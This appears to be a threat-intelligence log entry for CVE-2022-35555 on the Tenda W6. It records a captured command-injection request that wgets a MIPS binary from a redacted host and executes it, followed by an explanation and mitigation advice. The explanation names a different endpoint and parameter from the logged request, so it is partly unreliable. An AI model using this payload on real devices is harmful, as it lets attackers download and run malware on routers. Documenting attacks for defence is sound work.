CVE-2022-35555

2026-02-04

176.65.139.20

germany 

Tenda 

Tenda W6 V1.0.0.9(4122) 

POST /goform/formJsonAjaxReq HTTP/1.0
User-Agent: Mozilla/5.0
Host: ████████████
Content-Type: application/json
Content-Length: 304
X-Forwarded-For: █████████████
Referer: http://████████████:80/home.asp
████████████████████████████████████████
Connection: close

{"action":"set_online","data":{"agree":1,"check_ip1":"███████","check_ip2":"$(cd /var/tmp; rm data.mipsel-uclibc; wget http://██████████████:8080/file/data.mipsel-uclibc; chmod 777 data.mipsel-uclibc; chmod +x data.mipsel-uclibc; ./data.mipsel-uclibc)","enable":1,"interval":"10","reboot_interval":"30"}}

CVE-2022-35555 is a critical command injection vulnerability found in the Tenda W6 V1.0.0.9(4122) wireless access point. This vulnerability exists in the /goform/exeCommand endpoint, where attackers can exploit the cmdinput parameter to execute arbitrary commands on the device. The vulnerability allows remote attackers to gain control over the device, potentially leading to unauthorized access, data exfiltration, or further network compromise.
The vulnerability was reported by multiple sources, including the National Vulnerability Database (NVD), MITRE, Tenable, GitHub, OpenCVE, VulDB, Cloud Defense, and FortiGuard Labs. Despite its critical nature, the SUSE CVE-2022-35555 was marked as "REJECT" by its CNA, indicating it was determined not to be a security issue. However, other sources have confirmed its existence and potential impact.
Attackers can exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable endpoint. The exploitation does not require authentication, making it easier for attackers to target exposed devices. Once exploited, attackers can run arbitrary commands with the same privileges as the web server, which could lead to complete system compromise.
The criticality of this vulnerability is high due to the ease of exploitation and the potential impact on affected systems. Network administrators and security professionals should prioritize addressing this vulnerability to prevent potential attacks.

To mitigate the risk posed by CVE-2022-35555, users should take the following steps:

Update Firmware: Check for firmware updates from Tenda and apply any available patches that address this vulnerability.
Restrict Access: Limit access to the management interface of the Tenda W6 device to trusted networks only. Use firewall rules to block unauthorized access.
Monitor Traffic: Implement network monitoring to detect any unusual activity that may indicate exploitation attempts.
Disable Unused Services: Disable any services or features on the Tenda W6 device that are not in use to reduce the attack surface.
Regular Audits: Conduct regular security audits of network devices to ensure they are configured securely and are up to date with the latest patches.

By following these steps, users can reduce the risk of exploitation and protect their network from potential attacks.